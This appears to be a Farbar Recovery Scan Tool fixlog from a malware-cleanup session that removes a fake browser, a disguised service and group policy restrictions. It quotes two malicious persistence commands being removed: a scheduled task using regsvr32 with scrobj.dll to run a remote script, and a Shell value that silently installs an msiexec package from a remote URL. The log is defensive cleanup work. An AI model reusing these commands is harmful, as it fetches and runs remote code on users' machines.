Fix result of Farbar Recovery Scan Tool (x64) Version: 08-05-2017
Ran by fundowic (13-05-2017 18:14:31) Run:1
Running from C:\Users\fundowic\Desktop\FRST
Loaded Profiles: fundowic (Available Profiles: fundowic)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
Task: {E4F6EEF5-C592-488F-97B6-5D0BD01A5B68} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8xRkMdRYFdRkUcN8Y1N8U2F8F5NTLQMUI4NkVSRWk2Nq== scrobj.dll
C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{A334B4CB-70C2-40AE-AC60-82462738B5FA}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe
FirewallRules: [{8BFEA076-5BFA-4EB6-8DF9-B3B7E74FC8FC}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{3A44F400-C937-46F0-8F78-609CA667F38A}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Bagsarah
RemoveDirectory: C:\Users\fundowic\AppData\Local\Bagsarah
HKU\S-1-5-21-202387345-4201324245-3709672714-20981\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xRkMdRYFdRkUcN8Y1N8U2F8F5NTLQMUI4NkVSRWk2Nq== /q
GroupPolicy: Restriction <======= ATTENTION
R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [File not signed]
C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll
U3 mfeavfk01; no ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\ReadMe.txt.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\Uninstall WinZip.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\What's New.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\WinZip 8.1 .lnk
C:\Users\fundowic\AppData\Roaming\Microsoft\Word\kks%20stan%20faktyczny305905222082449539\kks%20stan%20faktyczny.docx.lnk
DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
DeleteKey: HKCU\Software\Google
DeleteKey: HKLM\SOFTWARE\Google
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google
C:\Program Files (x86)\Google
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
C:\Users\fundowic\AppData\Local\Google
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\fundowic\AppData\Local\Mozilla
C:\Users\fundowic\AppData\Roaming\Mozilla
C:\Users\fundowic\AppData\Roaming\Profiles
CMD: netsh winsock reset
EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E4F6EEF5-C592-488F-97B6-5D0BD01A5B68} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E4F6EEF5-C592-488F-97B6-5D0BD01A5B68} => key removed successfully
C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => key removed successfully
C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => moved successfully
C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => moved successfully
C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => moved successfully
C:\Users\Public\Desktop\Mozilla Firefox.lnk => moved successfully
C:\Users\Public\Desktop\Google Chrome.lnk => moved successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A334B4CB-70C2-40AE-AC60-82462738B5FA} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{8BFEA076-5BFA-4EB6-8DF9-B3B7E74FC8FC} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3A44F400-C937-46F0-8F78-609CA667F38A} => value removed successfully
"C:\Program Files (x86)\Bagsarah" => removed successfully.
"C:\Users\fundowic\AppData\Local\Bagsarah" => removed successfully.
HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => value removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
HKLM\System\CurrentControlSet\Services\OneDirveSrv => key removed successfully
OneDirveSrv => service removed successfully
C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll => moved successfully
HKLM\System\CurrentControlSet\Services\mfeavfk01 => key removed successfully
mfeavfk01 => service removed successfully
HKLM\System\CurrentControlSet\Services\VGPU => key removed successfully
VGPU => service removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\ReadMe.txt.lnk => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\Uninstall WinZip.lnk => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\What's New.lnk => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\WinZip 8.1 .lnk => moved successfully
C:\Users\fundowic\AppData\Roaming\Microsoft\Word\kks%20stan%20faktyczny305905222082449539\kks%20stan%20faktyczny.docx.lnk => moved successfully
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains => key removed successfully
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains => key not found.
HKCU\Software\Google => key not found.
HKLM\SOFTWARE\Google => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Google => key removed successfully
C:\Program Files (x86)\Google => moved successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome" => not found.
C:\Users\fundowic\AppData\Local\Google => moved successfully
HKCU\Software\Mozilla => key not found.
HKCU\Software\MozillaPlugins => key not found.
HKLM\SOFTWARE\Mozilla => key removed successfully
HKLM\SOFTWARE\MozillaPlugins => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Mozilla => key removed successfully
HKLM\SOFTWARE\Wow6432Node\mozilla.org => key not found.
HKLM\SOFTWARE\Wow6432Node\MozillaPlugins => key removed successfully
"C:\Users\fundowic\AppData\Local\Mozilla" => not found.
C:\Users\fundowic\AppData\Roaming\Mozilla => moved successfully
"C:\Users\fundowic\AppData\Roaming\Profiles" => not found.

========= netsh winsock reset =========

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.

========= End of CMD: =========

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 23574949 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/drivers => 469755972 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 81460045 B
Public => 0 B
ProgramData => 0 B
systemprofile => 67018 B
systemprofile32 => 66088 B
LocalService => 0 B
NetworkService => 3630 B
fundowic => 614602485 B
sys_augustyn => 305132294 B

RecycleBin => 0 B
EmptyTemp: => 1.4 GB temporary data Removed.

================================

The system needed a reboot.

==== End of Fixlog 18:15:44 ====